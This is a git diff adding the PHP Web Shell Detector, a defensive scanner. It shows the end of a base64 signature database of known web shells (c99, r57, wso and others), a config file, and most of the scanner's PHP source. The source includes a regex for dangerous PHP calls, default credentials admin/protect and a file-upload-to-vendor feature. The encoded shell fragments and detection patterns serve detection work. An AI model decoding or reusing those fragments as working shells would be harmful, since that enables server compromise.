+QyI7czoxOToiZmlsZXNtYW5bN11bMF1bcGhwXSI7czo2NDoidmRISStYRzRpT3dvS0lDQUpaV05v +YnlBaVBDOTBZV0pzWlQ0OEwzUmtQaUk3Q2dvZ0NXVmphRzhnSWp3dmRHRiI7czoyMDoicGhwc2hl +bGxbMTZdWzBdW3BocF0iO3M6NjQ6IkdWdVpDSTdEUXBpY21WaGF6c05DZzBLRFFvdkwxQklVQ0JG +ZG1Gc0lFTnZaR1VnWlhobFkzVjBhVzl1RFFwalkiO3M6MjE6ImthZG90c2hlbGxbMV1bMF1bcGhw +XSI7czo2NDoibVp2Y21zN0RRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUhONWMzUmxiU0FvWUNScmFXeHNa +R0FwT3cwS0lDQWdJQ0FnSSI7czoxNzoiaXJjX2JvdFsxXVswXVtwbF0iO3M6NjQ6Im1JekV3Tnpj +N0ppTXhNRGcxT3ljc0NpZHlkVjkwWlhoME5qUW5QVDRuSmlNeE1EUTBPeVlqTVRBNE1Ec21JekUi +O3M6MTQ6InI1N1syXVswXVtwaHBdIjtzOjY0OiIyUmxkWE1nVUdWeWJDQlNaVzF2ZEdVZ1UyaGxi +R3hjYmlJN0NncHplWE4wWlcwb1pHRjBaU2s3Q2dwemVYTjBaIjtzOjE4OiJhc21vZGV1c1swXVsw +XVtwbF0iO3M6NjQ6IlBEOXdhSEFOQ21sbUtDUmZVRTlUVkZzaWEyVjVJbDBnUFQwZ0ltWXdaR1Zr +TkRka1ptRTRZVE00WkdRME5tVTUiO3M6MTU6ImNtZFsxMF1bMF1bcGhwXSI7czo2NDoiNWhiV1U5 +TVNOamIyNTJaWEowUG0xa05Ud3ZZVDRwUEM5b01qNDhVRDRpT3dvS0lDQWdhV1lnS0NGcGMzTmxk +QyI7czoyMToicmVtb3Rldmlld1swXVswXVtwaHBdIjtzOjY0OiJkWUszVm1NRmdyVlVSdVkwbEVN +VEY0UldreVVrVlFhREJrVGpGa2JuRm9SVkY2YkRobmRsQnZUbGxtU0RGU2NYIjtzOjE0OiJyNTdb +OV1bMF1bcGhwXSI7czo2NDoiSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDUmthWEpmYkds +emRDQTlJR2x0WVhCZmJHbHpkQ2drYzNSeSI7czoyMzoic2hlbGxhcmNoaXZlWzBdWzBdW3BocF0i +O3M6NjQ6ImduTDJodmJXVXZKeTRrZFhObGNpNG5MM0IxWW14cFkxOW9kRzFzTDJGalkyVnpYM2Rs +WWk5amIyNW1hV2N1Y0ciO3M6MTk6InByaXY4X3NjclswXVswXVtwbF0iO3M6NjQ6InlPWEZtY0ha +RVdqSXdlVlpWV0VGUUlpd2lNazk1TldoV1VYaFVZazlyUWxNcmFUUmFVRVZFWm5ObVNqRXpSa1Yi +O3M6MjA6InBocHNoZWxsWzExXVswXVtwaHBdIjtzOjY0OiJsWFVrRnhPWEJRVTBKU2MwNTFZbmhr +T1N0WVlXaDJkMDVsU1hGRWRGSllSSEV2ZUZGTFdFTmxWRGx4SzNRTkNrIjtzOjE2OiJiMzc0a1s3 +XVswXVtwaHBdIjtzOjY0OiJRdVlYQndaVzVrUTJocGJHUW9aV1JwZENrN1ptbGxiR1F1YzNSNWJH +VXVaR2x6Y0d4aGVUMG5ibTl1WlNjN1pXIjtzOjI0OiJteXNxbF9hZG1pbmVyWzBdWzJdW3BocF0i +O3M6NjQ6ImNtUmxjam9nTVhCNElITnZiR2xrSUNORFFrRkNOemc3SUgwS0kyTnZiblJsYm5RZ2V5 +QndZV1JrYVc1bk9pQXgiO3M6MjA6ImxvYWRzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJCVlYzSTBj +M0EwVUVVdmRYTkJRM3A1U0U1alF6UTVaMUU0VEVab1puUnhPREJCT0hWSVEzaFVLMGNyYVc1Q1Zt +IjtzOjIwOiJmaWxlc21hblsxNl1bMF1bcGhwXSI7czo2NDoiWDJWNGFYTjBjeWdpYldGcGJDSXBL +WHNOQ21WamFHOGdKSFJoWW14bFgzVndNUzRrYkdGdVoxc2tiR0Z1WjNWaCI7czoxNDoicjU3WzZd +WzBdW3BocF0iO3M6NjQ6IlUxUkZ4YlhTOW5MQ0FpVzEwaUtUc0tDUWtKQ1ZSRWMyaGxiR3hmZEdG +aWMxOXRiMlJwWm5sZmRHRmlLR04xY24iO3M6MTg6InRkc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoi +TUNrN0NRb2dhV1lvSVNSamIyNXVaV04wYVc5dUtTQjdJR1psS0NSc1lXNW5kV0ZuWlN3d0tUc2dm +UW9nWld4eiI7czoxNToicjU3WzE5XVswXVtwaHBdIjtzOjY0OiJJaVJ5WldGc0wzTndiRzlwZEhv +dWVtbHdJanNnUHo0aVBqeGljajQ4WW5JK0lBbzhhVzV3ZFhRZ2RIbHdaVDF6IjtzOjE0OiJjOTlb +NF1bMF1bcGhwXSI7czo2NDoiUTdQQzltYjI1MFBpSXBPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQThj +Mk55YVhCMElIUjVjR1U5SW5SbGVIUXZhbSI7czoyMToicmVtb3Rldmlld1sxXVswXVtwaHBdIjtz +OjY0OiJKRVpQVWsxN1JFWkpURVY5S1NsYk4xMDdDaUFnSUNna1ptbHNaVzVoYldVZ1BTQWtSazlT +VFh0RVJrbE1SWDBwIjtzOjIyOiJwZXJsd2Vic2hlbGxbMF1bMF1bcGxdIjtzOjY0OiJkVFV5Y3NK +M2RsZWpkUVZ6QTVSa1pXY0RkU1pFcHNKeXduYmtsSGNpdFhiRFpDVDNZNGNsUjVkVmNuTENkVldX +IjtzOjIwOiJwaHBzaGVsbFsxMF1bMF1bcGhwXSI7czo2NDoiWDNJb0pFZE1UMEpCVEZNcE95Y3NE +UW9KSjNCb2NGOXBibWtuQ1QwK0NTY2tTVTVKUFdsdWFWOW5aWFJmWVd4cyI7czoxODoiZHhzaGVs +bFsyXVswXVtwaHBdIjtzOjY0OiJHUWdibTkzY21Gd1BpMHRQQzkwWkQ0bktUc0tDUWtKY0NnblBI +UmtJRzV2ZDNKaGNENG5LVHNLQ1FrSmNDZ25QIjtzOjE3OiJwaHBzcHlbNF1bMF1bcGhwXSI7czo2 +NDoibHVaM01uWFZzblptbHNaUzExY0d4dllXUW5YU2tnZXlBL1BnbzhZbkkrUEdKeVBnbzhabWxs +YkdSelpYUStDaSI7czoyMDoicGhwc2hlbGxbMTldWzBdW3BocF0iO3M6NjQ6IitTR1Y0UEM5MFpE +NDhkR1FnZDJsa2RHZzlKekkxSlNjZ1ltZGpiMnh2Y2owbkl6STRNamd5T0NjK1BDOTBaRDQiO3M6 +MTc6ImphY2thbFs0XVswXVtwaHBdIjtzOjY0OiJnWEc0aU93cGxZMmh2SUNJOFlTQm9jbVZtUFNj +a1VFaFFYMU5GVEVZL1lXTjBhVzl1UFhacFpYZEVZWFJoSm1SIjtzOjE2OiJteXNxbFswXVswXVtw +aHBdIjtzOjY0OiJZM2xtUVdGWWFWbEJXRUl6UVZOQlNFZzBRM2xCWVVGWU5XMXdkbUZYTkc5S2VH +WjNUMmxqYzBKRFJYQkdRa0k1IjtzOjE1OiJ3c29bMTNdWzBdW3BocF0iO3M6NjQ6InNJR1poYkhO +bElDazdEUXBvWldGa1pYSW9JQ2RRY21GbmJXRTZJRzV2TFdOaFkyaGxKeUFwT3cwS0RRcGxZMmgi +O3M6MjA6ImV4dHBsb3JlclswXVsyXVtwaHBdIjtzOjY0OiJWVGVYTjBaVzFQWW1wbFkzUWlLUW9K +Q1ZObGRDQm1JRDBnWm5OdkxrZGxkRVpwYkdVb2MzUnlSbWxzWlc1aGJXIjtzOjE3OiJyaHRvb2xb +MV1bMF1bYXNwXSI7czo2NDoiblF1UFNSc1lXNW5XeWQxY0d4dllXUnZheWRkT3dwOUNncHBaaWhw +YzNObGRDZ2tYMUJQVTFSYkozVndiRzloWiI7czoyMToiZmF0YWxzaGVsbFswXVswXVtwaHBdIjtz +OjY0OiJGWktUekpqV0c5b2NGWm1ORGtyVDJaMk4wbzRXRVk0ZDBSRk0wdFJLMlpSZGxwblQwSkVR +bGhSWkhGSllqaG9UIjtzOjIwOiJwaHBzaGVsbFszNF1bMF1bcGhwXSI7czo2NDoiSFV3TURZelhI +VXdNRFkxWEhVd01EWTBYSFV3TURZNVhIVXdNRFpEWEhVd01ETkNYSFV3TURJMlhIVXdNREl6WCI7 +czoxNToiY21kWzE5XVswXVtwaHBdIjtzOjY0OiJ5SWlrdVZtRnNkV1VLQ1cxaGVEMXZZbXBWY0d4 +dllXUXVSbWxsYkdSektDSnRZWGdpS1M1V1lXeDFaUW9LQ1daIjtzOjE3OiJ6ZWhpcjRbMV1bMF1b +cGhwXSI7czo2NDoidldVOXJPSE54T0dWalVtcEliakZtVjBKNEt6TXlhbmRtVlhKQ2VuQTNXVWRK +WkhsbE1scENiR2xLV25KaVpYUSI7czoyMDoicGhwc2hlbGxbMzZdWzBdW3BocF0iO3M6NjQ6ImMy +aHphR1Y0YVhRb0tUdDlDbWxtSUNna1lXTjBJRDA5SUNKelpXTjFjbWwwZVNJcENuc0tJR1ZqYUc4 +Z0lqeGoiO3M6MTU6ImM5OVsyNF1bMF1bcGhwXSI7czo2NDoiZEdnaUxDSjNLeUlwT3dvSlpuZHlh +WFJsSUNna1puQXNJaUlwSURzS0NXWjNjbWwwWlNBb0pHWndMQ1J6WVhabCI7czoyMjoic2ltYXR0 +YWNrZXJbMV1bMF1bcGhwXSI7czo2NDoiY2xkNWRHWlZNM05SUTJVNVlVWlliVk5OWkVOU1NFWjBS +REJtTURaVVREZExlVzluT1VKWmRscFFSRVZUTkd4RCI7czoxNToid3NvWzE1XVswXVtwaHBdIjtz +OjY0OiJJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FrWkc5elBTQWlRdlo1YkdVZ1FtbHlJRVJ2 +YzNsaElGWmhjbVI1IjtzOjE4OiJjYXN1czE1WzBdWzBdW3BocF0iO3M6NjQ6IjFsUFNReFhHNWNi +aUk3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0J3Y21sdWRDQjNhR2xzWlNnOFUwVk9SRVpKVEUiO3M6 +MTY6InRlbG5ldFswXVswXVtwbF0iO3M6NjQ6InlLRUJwYm1sZloyVjBLQ0p6WVdabFgyMXZaR1Vp +S1NrZ1BUMGdJbTl1SWlrZ2V5QWdKSE5oWm1WdGIyUmxJRDAiO3M6MzY6ImNyaXN0ZXJjb3JwX2lu +Zm9jb2xsZWN0b3JbMF1bMF1bcGhwXSI7czo2NDoiWnBaeTV3YUhBaUxBMEtDUWtpYkc5allYUmxJ +R052Ym1acFp5NXBibU1pSUQwK0lDSnNiMk5oZEdVZ1kyOXVabSI7czoyMDoiZmlsZXNtYW5bMjRd +WzBdW3BocF0iO3M6NjQ6ImpWRkJLVHpocmFFZHdaMjAxZDFoYVNscDBjbkZUYlU1MksydElTVkZJ +T1U5clZVOWlhQ3RDUlZoRGNXNVNlVGwiO3M6MjI6InRiZHNlY3VyaXR5WzBdWzBdW3BocF0iO3M6 +NjQ6IkZVU0doU1UyNUtSVk5IZDNsT01XUmhUVEExWVdOWVZUQk9WRmt4VkRGV2FGcFdRbTVQVnpr +MldYazVTRlF5VlQiO3M6MTU6Indzb1sxMl1bMF1bcGhwXSI7czo2NDoiRFZFMTRha1JVVDFaVVpW +bDBTR0ZzYzBkMWJtTklWR3gyWTNKR2VFWXdXRnBWYlc1S1R6TnBXRU5OTVdwbWJFeCI7czoxOToi +YmFja2Rvb3JbM11bMF1bcGhwXSI7czo2NDoiek12YjBwT1dtMU5OMDVRUW5JMVkzaHlhekJ6TlVR +clUzRnFNa2hhWWs1bmNHcExLMmhFTTBjaUxDSkllazVQViI7czoyNToic2hlbGxfdXBsb2FkZXJb +NF1bMF1bcGhwXSI7czo2NDoiVng0TkRoY2VEWTJYSGd6TTF4NE5EbGNlRFUwWEhnMVpWeDRObUpj +ZURNMVhIZzBNRng0TTJOY2VEWTVYSGd6TiI7czoxODoicG9zdG1hblswXVsxXVtwaHBdIjtzOjY0 +OiJObFltVmlaV0luUGcwS1BHTmxiblJsY2o0TkNqeGlQanhtYjI1MElITnBlbVU5SnpZbklHWmhZ +MlU5SjFkbFltIjtzOjE3OiJjb2RlcnpbMl1bMF1bcGhwXSI7czo2NDoiSE9XdFFWa0pRVlRGUksx +QkhiSFZqU0ZZd1NVaFNOV05IVlRsaFIyeHJXa2RXZFVsSE5XaGlWMVU1V1ZkT01FbCI7czoyMToi +bG9jdXNzaGVsbFsyXVswXVtwaHBdIjtzOjY0OiJOcGRHVXNJRGd3TENBa1pYSnlibThzSUNSbGNu +SnpkSElzSURNd0tUc2dEUXBwWmlBb0lTUm1jQ2tnZXlBTkNpIjtzOjE5OiJuaXhzaGVsbFsxXVsw +XVtwaHBdIjtzOjY0OiJWL2paQXhVSUJPMGM4ektjU210MXJnTmhOMHk4Z21PeHB3bHhkRzREWkxK +QVY1dHFkcHFtS3d1cDVFeUM2SlQyIjtzOjE5OiJ3ZWJhZG1pblsxXVsyXVtwaHBdIjtzOjY0OiI5 +bk93b0tJQ0JwWmlBb0pISmxjWFZwY21VcElIc0tJQ0FnSUNNZ1lXeHNJR1p2ZFc1a0lHZHZibTVo +SUdKbElHIjtzOjE3OiJ0ZWxuZXRkWzJdWzBdW3BsXSI7czo2NDoiaHlaV1k5SWlWelAzZHZjbXRm +WkdseVBTVnpJajRsY3p3dllUNHZ0Q3dLSkZCSVVGOVRSVXhHTENCMWNteGxibSI7czoxOToicGhw +c2hlbGxbM11bMF1bcGhwXSI7czo2NDoiMFpYSStQSFJoWW14bFBqeDBjajQ4ZEdRK1BHWnZjbTBn +WVdOMGFXOXVQVndpSkZOR2FXeGxUbUZ0WlQ4a2RYSiI7czoxOToic2FmZW1vZGVbM11bMF1bcGhw +XSI7czo2NDoiY21GdVoyVW9Ja0VpTENKYUlpa2dZWE1nSkd4bGRIUmxjaWtnRFFvSmV5QU5DZ2tr +WW05dmJDQTlJRUJwYzE5ayI7czoyMDoiZGV2aWx6MGRlWzBdWzBdW3BocF0iO3M6NjQ6IjBaRDVj +YmlJN0RRcHdjbWx1ZENBaVBIUmtQbHNnUEdFZ1kyeGhjM01nUFNCY0ltaGxZV1JjSWlCb2NtVm1J +RDAiO3M6MTc6Imxvc3RkY1sxXVswXVtwaHBdIjtzOjY0OiJTVzVNYldnd1lsZDRlbU5IVm1waFYw +WnpXVEpvYUdOdVRXOUtSamxSVkRGT1ZWZDVaR2hLTVRCd1RHbGphVkJwIjtzOjIwOiJ2MGxkM20w +cnRbMF1bMF1bcGhwXSI7czo2NDoiY01tSnZkRnd5WFRvZ2NHaHdZbTkwSURJdU1DQmllVHNnSTJO +eVpYZEFZMjl5Y0M0aUtUc05DaUFnSUNBZ0lDQSI7czoxNToicGJvdFsyXVswXVtwaHBdIjtzOjY0 +OiJRdFkyOXNiM0k2SUNNd01EQXdNREE3Q24wS0xuTjBlV3hsTkNCN1ptOXVkQzEzWldsbmFIUTZJ +R0p2YkdSOUNtIjtzOjE1OiJrcmFsWzBdWzBdW3BocF0iO3M6NjQ6IlpHMUdjMlJYVlRsSmJFcHNZ +bTFHZEZwVU9HbEpRemdyUkZGdk9GQXpRbTlqUTBJNVNVZFdjMk15Vm5CYWFXZHIiO3M6MTc6Imhz +aGVsbFswXVswXVtwaHBdIjtzOjY0OiJOMkpDYmxGMmRXUjRXREp1WlZadEt6Um9NekI0TjFBeFVF +aDJXblZIWWl0WVpub3hWbVpoY2tsaGFqWmljV2haIjtzOjIwOiJob3N0ZGV2aWxbMF1bMF1bcGhw +XSI7czo2NDoiOUlFTnZiVzFoYm1SVWVYQmxMbFJsZUhRN0RRb2dJQ0FnSUNBZ0lDQWdJQ0JqYjIx +dExrTnZiVzFoYm1SVVpYaCI7czoyMjoiYXNweC1zaGVsbFswXVswXVthc3B4XSI7czo2NDoiQ0l2 +SWl3Z0pHNWhiV1VwT3dva1puSWdQU0FpWEhnMU1GeDROR0pjZURBelhIZ3dOQ0k3Q2lSbWNpQXVQ +U0FpWCI7czoyNjoiaXRzZWN0ZWFtX3NoZWxsWzJdWzBdW3BocF0iO3M6NjQ6IklIc2dhV1lnS0NG +cGMxOXVkVzFsY21saktDUm1jV0pmYkdWdVoyaDBLU2tnZXlSbWNXSmZiR1Z1WjJoMElEMGciO3M6 +MjI6IkZhVGFMaXNUaUN6WzRdWzBdW3BocF0iO3M6NjQ6Im1kcGJpMXNaV1owT2lBMWNIZzdEUXA5 +RFFwcGJuQjFkQ0FzSUhSbGVIUmhjbVZoSUN3Z1luVjBkRzl1SUN3Z1kiO3M6Mjc6ImJydXRlX2Zv +cmNlX3Rvb2xbMV1bMF1bcGhwXSI7czo2NDoiZ0lEaHdkQ0FnSUNBZ0lDQWhhVzF3YjNKMFlXNTBP +d3BpWVdOclozSnZkVzVrTFdOdmJHOXlPaUFnSUNNeE1URSI7czoxODoiY3J5c3RhbFswXVswXVtw +aHBdIjtzOjY0OiJjR1U5WENKMFpYaDBYQ0krUEdKeVBncDFjMlZ5Ym1GdFpTQTZJRHhKVGxCVlZD +QnphWHBsUFZ3aU1UVmNJaUIyIjtzOjE3OiJ1cGRhdGVbMF1bMF1bcGhwXSI7czo2NDoiWEUzVTFJ +dlVITmFSRFp3V2xBNU1XTk5WQzlNT0ZkWFJYcExkbUptVkV4Sk9GaGpOa0ZxVm5wcmRuWjJOMnBw +TiI7czoyMjoiRmFUYUxpc1RpQ3pbNV1bMF1bcGhwXSI7czo2NDoiNWpkR2x2Ym5Nc0ozTm9aV3hz +WDJWNFpXTW5LU2w3SkdWNFpXTTlJSE5vWld4c1gyVjRaV01vSkdOdmJXMWhibSI7czoxNzoiamFj +a2FsWzVdWzBdW3BocF0iO3M6NjQ6ImpibFZ1UzFOcloyVXpRbWhqTTA0d1lVaEtNVXREVW1aVmEx +WlNWbFZXVkZaR2MyNWhSemt4V2tkc2RXRlRaR1IiO3M6MTQ6ImNtZFs1XVswXVtwaHBdIjtzOjY0 +OiIxUm5ObTkwSzNoRVZsbE1UM05EZGk5YWVtaDFSekZaVlZZNWRHOWhXbWRYVFVobVpWRkhUbGsz +ZFV4M01rTmtXIjtzOjE1OiJjOTlbMjNdWzBdW3BocF0iO3M6NjQ6IjFjSGdnT0hCNElDRnBiWEJ2 +Y25SaGJuUTdZbTl5WkdWeU9pQnViMjVsSUNGcGJYQnZjblJoYm5RN1ltOXlaR1YiO3M6MjA6ImNv +bmZpZ3NweVsyXVswXVtwaHBdIjtzOjY0OiIwWm1ZdllsVlpSVmhrYkc4d2MxWkdla1U0UTJFNVFW +UkRObEZ3Wld0aVprRlFVbEkyUlZwcU5GQmpkSGN5ZWpWIjtzOjIyOiJib2dlbF9zaGVsbFswXVsw +XVtwaHBdIjtzOjY0OiJKRjlRVDFOVVd5ZHpibTRuWFRzS2ZRcDlJR1ZzYzJVZ2V3b2tkVEZ3UFNS +ZlIwVlVXeWR6Ym00blhUc0tmUXA5IjtzOjIyOiJzbmlwZXJzaGVsbFswXVswXVtwaHBdIjtzOjY0 +OiIyTnlhV0pwYm1jZ2RHaGxJR1J5YVhabElIUjVjR1VnYjJZZ1lTQm5hWFpsYmlCRWNtbDJaU0J2 +WW1wbFkzUXVEIjtzOjE4OiJleHBsb3JlWzBdWzBdW2FzcF0iO3M6NjQ6ImdvZ0lDQWdJQ0FnSUNB +Z1BIUmtJR0ZzYVdkdVBTSmpaVzUwWlhJaUlHTnNZWE56UFNKMGFYUnNaU0krUkdGMFkiO3M6MTY6 +Im15c3FsWzRdWzBdW3BocF0iO30= diff --git a/doc/PHP-Shell-Detector-master/shelldetect.ini b/doc/PHP-Shell-Detector-master/shelldetect.ini new file mode 100644 index 0000000000000000000000000000000000000000..027b5885cde9e7e68cf8787a1a8f4f85b9bdeb86 --- /dev/null +++ b/doc/PHP-Shell-Detector-master/shelldetect.ini @@ -0,0 +1,14 @@ +extension[]=php +extension[]=txt +;is_cron=true +;showlinenumbers=true +;dateformat="H:i:s d/m/Y" +;language="" +;directory="" +;scan_hidden=true +;report_format="\s\h\e\l\l\d\e\t\e\c\t\o\r\_Gi-dmY.\h\t\m\l" +;filelimit=3000 +;authentication=false +;remotefingerprint=false +;hidesuspicious=false +;submitfile=1 diff --git a/doc/PHP-Shell-Detector-master/shelldetect.php b/doc/PHP-Shell-Detector-master/shelldetect.php new file mode 100644 index 0000000000000000000000000000000000000000..8fb3e1f1fa6e62ffe68c708b432c98a5e2ad1545 --- /dev/null +++ b/doc/PHP-Shell-Detector-master/shelldetect.php @@ -0,0 +1,731 @@ +<?php +/** + * Web Shell Detector v1.66 + * Web Shell Detector is released under the MIT License <http://www.opensource.org/licenses/mit-license.php> + * https://github.com/emposha/PHP-Shell-Detector + */ + +set_time_limit(0); + +//own error handler +set_error_handler(array("shellDetector", "error_handler")); + +// set the default timezone to use. +date_default_timezone_set('GMT'); + +$params = array('extension' => array('php', 'txt')); +if (is_file('shelldetect.ini')) { + $params = parse_ini_file('shelldetect.ini'); +} + +//static settings initialize +shellDetector::$_settings = $params; + +$shelldetector = new shellDetector($params); + +if ($shelldetector->isConsole()) { + $options = getopt("d:hcb"); + if (array_key_exists("d",$options)) { + $shelldetector->setDir($options["d"]); + } + if (array_key_exists("b",$options)) { + $shelldetector->setBrief(true); + } + if (array_key_exists("c",$options)) { + shellDetector::$_settings['is_cron'] = true; + $shelldetector->setCron(true); + } +} + +$shelldetector->start(); + +class shellDetector { + + //settings: extensions that should be scanned + private $extension = array('php'); + + //settings: show line number where suspicious function used + private $showlinenumbers = true; + + //settings: used with access time & modified time + private $dateformat = "H:i:s d/m/Y"; + + //settings: if I want to use other language + private $language = ''; + + //settings: if console used + private $console = false; + + //settings: if brief info is needed + private $brief = false; + + //settings: scan specific directory + private $directory = '.'; + + //settings: scan hidden files & directories + private $scan_hidden = true; + + //settings: perform different task + private $task = ''; + + //settings: used with is_cron(true) file format for report file + private $report_format = '\s\h\e\l\l\d\e\t\e\c\t\o\r\_Gi-dmY.\h\t\m\l'; + + //settings: if true run like a cron (no output) + private $is_cron = false; + + //settings: maximum files to scan (more then 30000 you should scan specific directory) + private $filelimit = 30000; + + //settings: protect script with user & password in case to disable simply set to NULL + private $authentication = array("username" => "admin", "password" => "protect"); + + //settings: get shells signatures db by remote + private $remotefingerprint = false; + + //settings: hide suspicious files + private $hidesuspicious = false; + + //settings: type of file submission to review (0 - old one not secure but will work with allow_url_fopen = false, 1 - new one more secure but allow_url_fopen need to be true.) + private $submitfile = 1; + + /* + * System variables + */ + //system variable used with output + static $_settings = array(); + + //system variable used with is_cron + static $_output = ''; + + // global counters + private $counter = 0; + private $suspcounter = 0; + + //system variable hold all scanned files + private $_files = array(); + + //system variable hold bad files + private $_badfiles = array(); + + //system: hold shells signatures + private $fingerprints = array(); + + //system: title + private $_title = 'Web Shell Detector'; + + //system: version of shell detector + private $_version = '1.66'; + + //system: regex for detect Suspicious behavior + private $_regex = '%(preg_replace.*\/e|`.*?\$.*?`|\bcreate_function\b|\bpassthru\b|\bshell_exec\b|\bexec\b|\bbase64_decode\b|\bedoced_46esab\b|\beval\b|\bsystem\b|\bproc_open\b|\bpopen\b|\bcurl_exec\b|\bcurl_multi_exec\b|\bparse_ini_file\b|\bshow_source\b)%'; + + //system: public key to encrypt file content + private $_public_key = 'LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0NCk1JR2ZNQTBHQ1NxR1NJYjNEUUVCQVFVQUE0R05BRENCaVFLQmdRRDZCNWZaY2NRN2dROS93TitsWWdONUViVU4NClNwK0ZaWjcyR0QvemFrNEtDWkZISEwzOHBYaS96bVFBU1hNNHZEQXJjYllTMUpodERSeTFGVGhNb2dOdzVKck8NClA1VGprL2xDcklJUzVONWVhYUQvK1NLRnFYWXJ4bWpMVVhmb3JIZ25rYUIxQzh4dFdHQXJZWWZWN2lCVm1mRGMNCnJXY3hnbGNXQzEwU241ZDRhd0lEQVFBQg0KLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tDQo='; + + private $_self = ''; + + /** + * Constructor + */ + function __construct($settings = null) { + if (is_array($settings)) { + $own = get_object_vars($this); + foreach ($settings as $key => $value) { + if (key_exists($key, $own) && substr($key, 0, 1) != '_') { + $this->$key = $value; + } + } + $this->_self = basename(__FILE__); + } + + if ($this->authentication != null) { + if ((!isset($_SERVER['PHP_AUTH_USER']) || (isset($_SERVER['PHP_AUTH_USER']) && $_SERVER['PHP_AUTH_USER'] != $this->authentication['username'])) || (!isset($_SERVER['PHP_AUTH_PW']) || (isset($_SERVER['PHP_AUTH_PW']) && $_SERVER['PHP_AUTH_PW'] != $this->authentication['password']))) { + header('WWW-Authenticate: Basic realm="Login"'); + header('HTTP/1.0 401 Unauthorized'); + echo $this->t('Please login to continue.'); + exit ; + } + } + + if (isset($_GET['task'])) { + $this->task = $_GET['task']; + } + + if (isset($_GET['s']) && 1 == $_GET['s']) { + $this->hidesuspicious = false; + } + + if (file_exists('shelldetect.db')) { + $context = stream_context_create(array('http' => array('timeout' => 30))); + $this->fingerprints = unserialize(base64_decode(file_get_contents('shelldetect.db', 0, $context))); + } + + if ($this->remotefingerprint) { + $this->fingerprints = unserialize(base64_decode(file_get_contents('https://raw.github.com/emposha/PHP-Shell-Detector/master/shelldetect.db'))); + } + } + + public function setDir($dir) { + $this->directory = $dir; + } + + public function setCron($val) { + $this->is_cron = $val; + } + + public function setBrief($val) { + $this->brief = $val; + } + + public function isBrief() { + return $this->brief; + } + + public function isConsole() { + return $this->console; + } + + /** + * Start function + */ + public function start() { + switch ($this->task) { + case 'sendfile': + $this->sendfile(); + break; + case 'getsha': + $this->header(); + $this->filescan(); + $this->showsha(); + $this->footer(); + break; + case 'update': + $this->header(); + $this->update(); + $this->footer(); + break; + default: + $this->header(); + $this->version(); + $this->filescan(); + $this->anaylize(); + $this->footer(); + break; + } + } + + /** + * Update function get latest update + */ + private function update() { + if ($this->version()) { + $context = stream_context_create(array('http' => array('timeout' => 30))); + $content = file_get_contents('https://raw.github.com/emposha/PHP-Shell-Detector/master/shelldetect.db', 0, $context); + chmod('shelldetect.db', 0777); + if (file_put_contents('shelldetect.db', $content)) { + self::output($this->t('Shells signature database updated succesfully!')); + } else { + self::output($this->t('Cant save shells signature database please check permissions'), 'error'); + } + } else { + self::output($this->t('Your shells signatures database already updated!')); + } + } + + /** + * Check version function + */ + private function version() { + $context = stream_context_create(array('http' => array('timeout' => 10, 'header' => 'Connection: close'))); + //check application version + $app_version = floatval($this->_version); + $server_version = file_get_contents('https://raw.github.com/emposha/PHP-Shell-Detector/master/version/app', 0, $context); + if (strlen($server_version) != 0 && floatval($server_version) != 0 && (floatval($server_version) > $app_version)) { + self::output($this->t('New version of application found. Please update!'), 'error'); + } else if (strlen($server_version) == 0 || intval($server_version) == 0) { + self::output($this->t('Cant connect to server! Application version check failed!'), 'error'); + } + + $version = isset($this->fingerprints['version']) ? $this->fingerprints['version'] : 0; + $server_version = file_get_contents('https://raw.github.com/emposha/PHP-Shell-Detector/master/version/db', 0, $context); + if (strlen($server_version) != 0 && intval($server_version) != 0 && (intval($server_version) > intval($version))) { + self::output($this->t('New version of shells signature database found. Please update!'), 'error'); + return true; + } else if (strlen($server_version) == 0 || intval($server_version) == 0) { + self::output($this->t('Cant connect to server! Version check failed!'), 'error'); + } + unset($this->fingerprints['version']); + return false; + } + + /** + * Send file to analyze + */ + private function sendfile() { + self::output('<style>.error{font-size: 14px;font-family: arial;margin: 0px;padding: 2px 6px 0px 0px;color: #DD3C10;text-align: center;}.success{font-size: 14px;font-family: arial;margin: 0px;padding: 2px 6px 0px 0px;color: #92B901;text-align: center;}</style>'); + if (isset($_POST['filename'])) { + $filename = base64_decode($_POST['filename']); + if (file_exists($filename)) { + $email = isset($_POST['email']) ? $_POST['email'] : ''; + $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : $_SERVER["SERVER_NAME"]; + $postdata = http_build_query(array('task' => 'submit', 'ver' => '2', 'code' => base64_encode(file_get_contents($filename)), 'email' => $email, 'ip' => $_SERVER['REMOTE_ADDR'])); + $context = stream_context_create(array('http' => array('method' => 'POST', 'header' => "Content-type: application/x-www-form-urlencoded\r\nReferer: " . $referer . "\r\n", 'content' => $postdata))); + $server_version = file_get_contents('http://www.shelldetector.com/api/', 0, $context); + self::output($server_version, 'success'); + } else { + self::output($this->t('Cant find selected file.'), 'error'); + } + } else { + self::output($this->t('No file specified.'), 'error'); + } + } + + /** + * Scan function executer + */ + private function filescan() { + self::output($this->t('Starting file scanner, please be patient file scanning can take some time.')); + self::output($this->t('Number of known shells in database is: ') . count($this->fingerprints)); + self::output('<div class="info">' . $this->t('Files found:') . '<span class="filesfound">', null, false); + $this->listdir($this->directory); + self::output('</span></div>', null, false); + if ($this->filelimit>0) { + if (count($this->_files) > $this->filelimit) { + self::output($this->t('File limit reached, scanning process stopped.')); + } + } + if ($this->filelimit>0) { + self::output($this->t('File scan done, we have: @count files to analize', array("@count" => count($this->_files)))); + } else { + self::output($this->t('File scan done, we have: @count files to analize', array("@count" => $this->counter))); + } + if ($this->hidesuspicious) { + self::output($this->t('Please note suspicious files information will not be displayed'), 'error'); + } + } + + /** + * Show sha1 for found files + */ + private function showsha() { + foreach ($this->_files as $file) { + self::output('<dl><dt>' . $this->t('Show sha for file:') . ' ' . basename($file) . '<span class="plus">-</span></dt>', null, false); + self::output('<dd><dl><dt>' . $this->t('Full path:') . '</dt><dd>' . $file . '</dd>', null, false); + self::output('<dt>' . $this->t('Sha1:') . '</dt><dd>' . sha1_file($file) . '</dd></dl></dd></dl>', null, false); + } + self::output('', 